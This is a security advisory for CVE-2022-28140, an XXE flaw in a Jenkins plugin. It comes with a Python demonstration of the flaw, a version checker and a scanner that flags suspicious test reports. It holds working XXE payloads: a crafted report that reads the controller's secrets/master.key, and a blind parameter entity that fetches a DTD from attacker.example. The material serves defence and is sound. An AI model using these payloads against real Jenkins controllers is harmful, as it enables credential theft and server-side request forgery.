CVE-2022-28140

8.1 HIGH

📋 TL;DR

Jenkins Flaky Test Handler Plugin 1.2.1 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. An attacker who can control the contents of a test report that the plugin parses (for example by influencing what a build writes to its test report) can have the Jenkins controller parse a crafted XML document whose external entities read files from the controller file system or perform server-side request forgery (SSRF) from the controller. Any Jenkins instance with an affected plugin version installed and enabled is exposed.
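
The parser misconfiguration and its fix side by side, as an added example that is not the plugin's code: Python's xml.sax stands in for the Java parser the plugin uses, and its feature_external_ges switch plays the role of the Java parser's external-entity resolution setting (enabled in 1.2.1 and earlier, disabled by the 1.2.2 fix). The JUnit-style report, the temporary "secret" file and the entity name xxe are constructed for the example.

```python
"""XXE through an unconfigured SAX parser, and the hardening that closes it.

Python's xml.sax is a stand-in for the Java parser the plugin uses; the
feature_external_ges flag models the external-entity resolution setting.
"""
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax import handler


class TextCollector(handler.ContentHandler):
    """Collect the character data of every <failure> element in a report."""

    def __init__(self):
        super().__init__()
        self.in_failure = False
        self.failures = []

    def startElement(self, name, attrs):
        if name == "failure":
            self.in_failure = True
            self.failures.append("")

    def endElement(self, name):
        if name == "failure":
            self.in_failure = False

    def characters(self, content):
        # Character data from an expanded external entity arrives here too,
        # which is exactly how the file contents end up in the parsed report.
        if self.in_failure:
            self.failures[-1] += content


def parse_report(report: bytes, resolve_external_entities: bool) -> list:
    """Parse a JUnit-style report and return the text of its <failure> elements.

    resolve_external_entities=True mimics the unconfigured parser in plugin
    versions <= 1.2.1; False mimics the 1.2.2 fix, which disables external
    entity resolution so the entity is declared but never fetched.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(report))
    return collector.failures


def build_malicious_report(target_uri: str) -> bytes:
    """A constructed test report carrying the classic XXE payload."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE testsuite [
  <!ENTITY xxe SYSTEM "{target_uri}">
]>
<testsuite name="com.example.FlakyTest" tests="1" failures="1">
  <testcase classname="com.example.FlakyTest" name="testOnce">
    <failure message="boom">&xxe;</failure>
  </testcase>
</testsuite>
""".encode()


def demo() -> tuple:
    """Return (vulnerable_result, hardened_result) for the same crafted report."""
    # Temporary file standing in for a controller secret such as
    # $JENKINS_HOME/secrets/master.key (constructed for the example).
    fd, secret_path = tempfile.mkstemp(suffix=".key")
    with os.fdopen(fd, "wb") as f:
        f.write(b"s3cr3t-master-key")
    try:
        report = build_malicious_report(pathlib.Path(secret_path).as_uri())
        vulnerable = parse_report(report, resolve_external_entities=True)
        hardened = parse_report(report, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return vulnerable, hardened


if __name__ == "__main__":
    vuln, fixed = demo()
    print("unconfigured parser:", vuln)   # the secret leaks into the failure text
    print("hardened parser:    ", fixed)  # entity dropped, nothing is read
```

The hardened call never opens the target URI at all, which is why it is also safe against SSRF: the SYSTEM identifier is simply not resolved. Note that a Java parser needs the equivalent features disabled (external general and parameter entities, external DTD loading, or DOCTYPE altogether); this example only models the general-entity switch.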

💻 Affected Systems

Products:
  • Jenkins Flaky Test Handler Plugin
Versions: 1.2.1 and earlier
Operating Systems: All platforms running Jenkins
Default Config Vulnerable: ⚠️ Yes
Notes: Every instance with an affected version installed and enabled is exposed regardless of job configuration, because the plugin's own parser settings are the problem. Exploitation still requires an attacker who can get a crafted test report parsed, so exposure is bounded by who can influence build output on the controller.

📦 What is this software?

Flaky Test Handler Plugin is a Jenkins plugin for dealing with flaky tests: it reads rerun results from test reports (such as those produced with Maven Surefire's rerunFailingTestsCount option) and shows flakiness statistics per build. The vulnerable code path is the XML parsing of those test reports, which happens on the Jenkins controller.

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker who gets a crafted test report parsed reads any file the Jenkins process can read on the controller (configuration, credentials.xml and the secrets/ directory that protects stored credentials) and uses the controller as an SSRF pivot against internal services it can reach. Stored credentials and API tokens recovered this way are the usual route from file read to takeover of the controller and the systems it deploys to.

🟠

Likely Case

An attacker with control over build output (for example through a source repository or agent that feeds this controller) reads configuration files and stored secrets from the controller file system, exposing credentials for other systems.

🟢

If Mitigated

With the plugin disabled or removed the vulnerable parser is never invoked. Network segmentation and egress filtering only blunt the SSRF half; they do not stop file reads, which happen locally on the controller.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: No; the attacker must be able to control the contents of a test report the plugin parses
Complexity: LOW

XXE is a well-understood bug class: a generic XXE payload drops into a JUnit-style report unchanged, and the entity fetch happens on the controller, so no further Jenkins-specific knowledge is needed. The Jenkins advisory describes the flaw but ships no exploit.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.2.2

Vendor Advisory: https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-1896

Restart Required: Yes

Instructions:

1. Open Manage Jenkins > Manage Plugins > Updates (the Available tab only lists plugins that are not yet installed)
2. Select 'Flaky Test Handler Plugin' and choose 'Download now and install after restart'
3. Restart Jenkins so the new plugin version is loaded
4. Confirm the Installed tab shows Flaky Test Handler Plugin 1.2.2 or later

🔧 Temporary Workarounds

Disable vulnerable plugin

Platforms: all

Temporarily disable the Flaky Test Handler Plugin if immediate patching is not possible

Navigate to Manage Jenkins > Manage Plugins > Installed
Find 'Flaky Test Handler Plugin'
Click 'Disable'

🧯 If You Can't Patch

  • Remove the Flaky Test Handler Plugin entirely from Jenkins
  • Treat test reports as untrusted input: until patched, limit which repositories, contributors and agents can produce builds on this controller
  • Implement strict network segmentation and egress filtering to isolate the controller from sensitive internal systems (this limits SSRF, not file reads)

🔍 How to Verify

Check if Vulnerable:

Check plugin version in Jenkins: Manage Jenkins > Manage Plugins > Installed > Flaky Test Handler Plugin

Check Version:

Check the Jenkins plugin directory or use the Jenkins CLI (add -auth user:apitoken if anonymous access is not permitted): java -jar jenkins-cli.jar -s http://jenkins-url/ list-plugins | grep -i flaky

Verify Fix Applied:

Verify plugin version is 1.2.2 or later in the Installed Plugins list
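
The same version check against the plugin manager JSON API, as an added example (not a Jenkins-supplied tool). It assumes the plugin's short name flaky-test-handler from the advisory and the endpoint /pluginManager/api/json?depth=1; the sample JSON documents are constructed, not captured from a real controller.

```python
"""Check whether the Flaky Test Handler plugin on a controller is at a fixed version.

Reads the plugin list from Jenkins' plugin manager JSON API and compares the
installed version with the fixed release using a numeric-aware comparison.
"""
import base64
import json
import re
import urllib.request

PLUGIN_SHORT_NAME = "flaky-test-handler"   # short name given in the advisory
FIXED_VERSION = "1.2.2"


def version_key(version: str) -> tuple:
    """Numeric-aware key so that '1.10' sorts after '1.2.1', unlike a string compare.

    Only the leading dotted-number part is compared; any qualifier after it
    is ignored.
    """
    match = re.match(r"\d+(?:\.\d+)*", version.strip())
    if not match:
        raise ValueError(f"unparseable plugin version: {version!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def is_vulnerable(version: str) -> bool:
    """True for 1.2.1 and earlier, False for 1.2.2 and later."""
    return version_key(version) < version_key(FIXED_VERSION)


def assess(plugin_manager_json: str) -> dict:
    """Summarise the plugin's status from a plugin manager API document."""
    plugins = json.loads(plugin_manager_json).get("plugins", [])
    for plugin in plugins:
        if plugin.get("shortName") == PLUGIN_SHORT_NAME:
            version = plugin.get("version", "")
            return {
                "installed": True,
                "version": version,
                # A disabled plugin is not loaded, so the workaround applies;
                # 'vulnerable' reports the version status alone.
                "enabled": bool(plugin.get("enabled", True)),
                "vulnerable": is_vulnerable(version),
            }
    return {"installed": False, "version": None, "enabled": False, "vulnerable": False}


def fetch_plugin_manager_json(jenkins_url: str, user: str, api_token: str) -> str:
    """Fetch the plugin list with HTTP basic auth (Jenkins user + API token)."""
    url = jenkins_url.rstrip("/") + "/pluginManager/api/json?depth=1"
    request = urllib.request.Request(url)
    credentials = base64.b64encode(f"{user}:{api_token}".encode()).decode()
    request.add_header("Authorization", "Basic " + credentials)
    with urllib.request.urlopen(request, timeout=15) as response:
        return response.read().decode("utf-8")


# Constructed samples for offline use (not real controller output).
SAMPLE_VULNERABLE = json.dumps({"plugins": [
    {"shortName": "junit", "version": "1.60", "enabled": True},
    {"shortName": "flaky-test-handler", "version": "1.2.1", "enabled": True},
]})
SAMPLE_FIXED = json.dumps({"plugins": [
    {"shortName": "flaky-test-handler", "version": "1.2.2", "enabled": True},
]})
SAMPLE_ABSENT = json.dumps({"plugins": [
    {"shortName": "junit", "version": "1.60", "enabled": True},
]})


if __name__ == "__main__":
    for label, document in (("vulnerable", SAMPLE_VULNERABLE),
                            ("fixed", SAMPLE_FIXED),
                            ("absent", SAMPLE_ABSENT)):
        print(label, assess(document))
    # Live use: assess(fetch_plugin_manager_json("https://jenkins.example", "admin", "<api token>"))
```

Run it across every controller you operate rather than only the one you remember installing the plugin on; the numeric comparison matters because a plain string compare would wrongly mark a future 1.10 release as older than 1.2.2.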

📡 Detection & Monitoring

Log Indicators:

  • SAXParseException or other XML parsing errors in the controller log while test reports are processed (a failed entity fetch surfaces this way; a successful read of an existing file produces no error at all)
  • Test report XML files in workspaces or archived results that contain <!DOCTYPE or <!ENTITY declarations; JUnit and Surefire reports normally carry none

Network Indicators:

  • Outbound HTTP/FTP connections or DNS lookups from the Jenkins controller (not the agents) to internal hosts or unknown external hosts that coincide with test report processing
  • Requests to internal services whose source address is the controller rather than a build agent

SIEM Query:

source="jenkins.log" AND ("SAXParseException" OR "FileNotFoundException" OR "UnknownHostException")

Log searches only catch failed entity fetches; the reliable check is scanning the test report files themselves for DTD declarations.
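
A scanner for that file-level check, as an added example (not tooling from Jenkins or the plugin). It flags test reports that carry a DTD, an external entity or a parameter entity before any parser touches them; the benign and crafted reports, the attacker.example host and the /var/lib/jenkins path are constructed for the example.

```python
"""Flag test report XML that carries a DTD: the precondition for an XXE payload.

JUnit/Surefire-style reports normally contain no <!DOCTYPE>, so a DTD, and
especially an external entity (SYSTEM/PUBLIC), is a strong signal that a
report was crafted. Patterns run over raw bytes so malformed files are
still inspected.
"""
import pathlib
import re

DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b")
EXTERNAL_DTD_RE = re.compile(rb"<!DOCTYPE\s+[^\s>\[]+\s+(?:SYSTEM|PUBLIC)\b")
EXTERNAL_ENTITY_RE = re.compile(rb"<!ENTITY\s+%?\s*[^\s>]+\s+(?:SYSTEM|PUBLIC)\b")
PARAMETER_ENTITY_RE = re.compile(rb"<!ENTITY\s+%")
# URL schemes a Java parser will happily fetch for an entity.
URI_RE = re.compile(rb"(?:file|https?|ftp|jar):[^\s\"'>]*", re.IGNORECASE)


def scan_report(name: str, data: bytes) -> list:
    """Return findings for one report; an empty list means nothing suspicious."""
    findings = []
    # A DTD can only appear in the prolog, so only that region is examined.
    subset_end = data.find(b"]>")
    head = data[: subset_end + 2] if subset_end != -1 else data[:4096]
    if DOCTYPE_RE.search(head):
        findings.append(f"{name}: DOCTYPE declaration present")
    if EXTERNAL_DTD_RE.search(head):
        findings.append(f"{name}: external DTD referenced")
    if EXTERNAL_ENTITY_RE.search(head):
        uris = [u.decode(errors="replace") for u in URI_RE.findall(head)]
        findings.append(f"{name}: external entity declared, targets {uris}")
    if PARAMETER_ENTITY_RE.search(head):
        findings.append(f"{name}: parameter entity (blind/out-of-band XXE pattern)")
    return findings


def scan_tree(root: str) -> list:
    """Walk a directory (a workspace or archived reports) and scan every .xml file."""
    findings = []
    for path in pathlib.Path(root).rglob("*.xml"):
        findings.extend(scan_report(str(path), path.read_bytes()))
    return findings


# Constructed sample reports.
BENIGN_REPORT = b"""<?xml version="1.0" encoding="UTF-8"?>
<testsuite name="com.example.StableTest" tests="1" failures="0">
  <testcase classname="com.example.StableTest" name="testOk" time="0.01"/>
</testsuite>
"""

CRAFTED_REPORT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE testsuite [
  <!ENTITY xxe SYSTEM "file:///var/lib/jenkins/secrets/master.key">
]>
<testsuite name="com.example.FlakyTest" tests="1" failures="1">
  <testcase classname="com.example.FlakyTest" name="testOnce">
    <failure message="boom">&xxe;</failure>
  </testcase>
</testsuite>
"""

BLIND_REPORT = (b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % ext SYSTEM '
                b'"http://attacker.example/x.dtd"> %ext;]><x/>')


if __name__ == "__main__":
    for line in (scan_report("benign.xml", BENIGN_REPORT)
                 + scan_report("crafted.xml", CRAFTED_REPORT)
                 + scan_report("blind.xml", BLIND_REPORT)):
        print(line)
```

Point scan_tree at agent workspaces and at the controller's archived build data; a DOCTYPE alone is a weak signal (some tools emit one), but an entity with a SYSTEM identifier in a test report has no legitimate use.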

🔗 References

  • Jenkins Security Advisory 2022-03-29, SECURITY-1896: https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-1896
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2022-28140